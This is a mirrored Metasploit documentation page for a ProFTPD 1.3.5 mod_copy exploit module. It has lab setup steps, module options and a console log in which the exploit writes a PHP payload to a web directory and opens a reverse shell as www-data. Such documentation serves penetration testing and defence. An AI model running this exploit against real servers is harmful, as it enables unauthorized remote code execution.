CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md
Views: 1904

Vulnerable Application

This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

Installation Steps

Download and build:

sudo apt install gcc make
wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz
tar zxvf proftpd-1.3.5.tar.gz
cd proftpd-1.3.5
./configure --with-modules=mod_copy
make

Run ProFTPD using the sample default configuration file (in foreground with -n flag for testing):

sudo ./proftpd -n -c "`pwd`/sample-configurations/basic.conf"

Set up a web server with a world-writable directory:

sudo apt install php apache2
sudo mkdir /home/var/www/html/test
sudo chmod 777 /var/www/html/test

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/unix/ftp/proftpd_modcopy_exec

  4. Do: set rhosts <rhosts>

  5. Do: set rport_ftp <remote ftp port>

  6. Do: set tmppath <writable temporary file path>

  7. Do: set sitepath <writable web server file path>

  8. Do: run

  9. You should get a new session.

Options

RPORT_FTP

FTP port (default: 21)

TMPPATH

Absolute writable path (default: /tmp)

SITEPATH

Absolute writable website path (default: /var/www)

Scenarios

ProFTPD 1.3.5 on Ubuntu 22.04

msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.200.158
rhosts => 192.168.200.158
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > check
[*] 192.168.200.158:80 - The target appears to be vulnerable. 192.168.200.158:21 - Unauthenticated SITE CPFR command was successful
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html/test
sitepath => /var/www/html/test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set targeturi /test
targeturi => /test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.158:80 - 192.168.200.158:21 - Connected to FTP server
[*] 192.168.200.158:80 - 192.168.200.158:21 - Sending copy commands to FTP server
[*] 192.168.200.158:80 - Executing PHP payload /test/EbzQzU.php
[+] 192.168.200.158:80 - Deleted /var/www/html/test/EbzQzU.php
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.158:46352) at 2023-03-19 00:22:49 -0400

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html/test